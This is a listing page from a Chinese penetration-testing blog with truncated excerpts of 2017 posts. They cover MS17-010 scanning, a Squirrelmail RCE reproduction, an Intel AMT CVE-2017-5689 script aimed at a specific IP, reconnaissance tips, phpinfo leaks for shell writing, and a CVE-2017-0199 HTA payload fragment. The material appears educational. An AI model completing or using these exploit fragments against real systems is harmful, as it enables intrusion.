热门 MS17-010漏洞检测与内网穿透技术的应用

时间:2017-5-15   作者:webbaozi   分类: 渗透测试   热度:3532°    
时间:2017-5-15   分类: 渗透测试    热度:3532  
0x00 前言 本文主要介绍一下MSF模块的下载、使用,以及当攻击机处于内网,而目标机也处于内网的解决方法。这里借助MS17-010漏洞来具体讲解一下,并没有新的知识点,可以为刚入门的新手抛砖引玉,提供一条解决问题的思路,同时也记录一下过程,加强记忆。 主要分为两个知识点,一是SMB漏洞的批量检测,二是内网穿透技术。 首先是环境的搭建,具体如下表所示: 主机 IP 备注 ...

阅读全文>>

热门 Squirrelmail远程代码执行漏洞(CVE-2017-7692)复现+修复方案

时间:2017-5-14   作者:webbaozi   分类: 渗透测试   热度:1087°    
时间:2017-5-14   分类: 渗透测试    热度:1087  
一:实验环境 操作机:kali2.0 目标机:Centos 6.0 Squirrelmail版本:1.4.22-4el6 二、漏洞原理 1、有一个可以登录的邮箱账号和密码 2、Squirrelmai的MAT(因特网邮件传送代理)需要配置Sendmail 3、Squirrelmail的edit_identity配置为true(默认配置) 该漏洞的触发点位于Squirrelmail源码中的Deliver_SendMail.class.php文件中,在initStream函数中,使用了escapeshellcmd()来过滤用户的信息,然后将处理后的字...

阅读全文>>

热门 CVE-2017-5689(Intel产品AMT)利用小脚本

时间:2017-5-11   作者:webbaozi   分类: 渗透测试   热度:1427°    
时间:2017-5-11   分类: 渗透测试    热度:1427  
检测脚本如下,使用方法: python CVE-2017-5689.py http://1.245.154.138:16992/index.htm #!/usr/bin/python # -*- coding: utf-8 -*- #by hackteam.cn import requests def exploit(url): status = False headers = {"User-Agent": "Mozilla/5.0"} httprsp = requests.get(url, headers=header...

阅读全文>>

热门 漏洞挖掘经验分享

时间:2017-4-29   作者:webbaozi   分类: 渗透测试   热度:1089°    
时间:2017-4-29   分类: 渗透测试    热度:1089  
我平时挖洞的经验,我总结了一下,大概有以下几点: 1、收集信息,尽可能的越多越好(主域名、IP段、搜索引擎、GitHub等)。 2、收集好信息后,对收集的信息进行一些扩展,增加信息收集的量(可以用SubDomain工具批量收集厂商域名信息,域名对应IP,数据多了之后,就可以拿来分析域名的真实地址、以及潜在的IP段)。 3、对IP段、子域名等进行大量破解,这里我们要经常收集一些SRC开发常用的端口、以及一些域名的命名习惯(GitHub上面有很多现成的端口,平时收集信息的时候,可以多注意一下)。 4、收集对方的邮箱账号命名习惯(因为好多官方后台都是用...

阅读全文>>

热门 从phpinfo中能获取哪些敏感信息

时间:2017-4-23   作者:webbaozi   分类: 渗透测试   热度:1501°    
时间:2017-4-23   分类: 渗透测试    热度:1501  
phpinfo()想必的最熟悉的了,在搭建环境之后都会随后写一个phpinfo()来测试环境是否正常,很多人测试完毕忘记删除就开始部署环境了,这就造成了一些敏感信息的泄漏。那么我们能从phpinfo()中获得哪些敏感信息呢?php版本这种就不用说了,来看一下泄漏了哪些比较敏感的信息。 一、绝对路径(_SERVER[“SCRIPT_FILENAME”]) 这个是最常用,也是最有效的一个办法,找到phpinfo()页面可以直接找到网站的绝对路径,对于写shell和信息搜集是必不可少的。 二、支持的程序 可以通过phpinfo()查...

阅读全文>>

热门 CVE-2017-0199 OFFICE OLE2LINK漏洞利用详解

时间:2017-4-18   作者:webbaozi   分类: 渗透测试   热度:1419°    
时间:2017-4-18   分类: 渗透测试    热度:1419  
漏洞概述 fireeye最近公布了一个OFFICE 0day,在无需用户交互的情况下,打开word文档就可以通过hta脚本执行任意代码。经过研究发现,此漏洞的成因主要是word在处理内嵌OLE2LINK对象时,通过网络更新对象时没有正确处理的Content-Type所导致的一个逻辑漏洞。 漏洞利用方法 首先准备一台apache服务器,web根目录下保存一个1.rtf文件,内容如下: test789 <script> var objShell = new ActiveXObject("wscript.shell"); objSh...

阅读全文>>

返回顶部    首页    手机版本   
版权所有:baozi|学与用    站长: webbaozi  蜀ICP备16032848号-1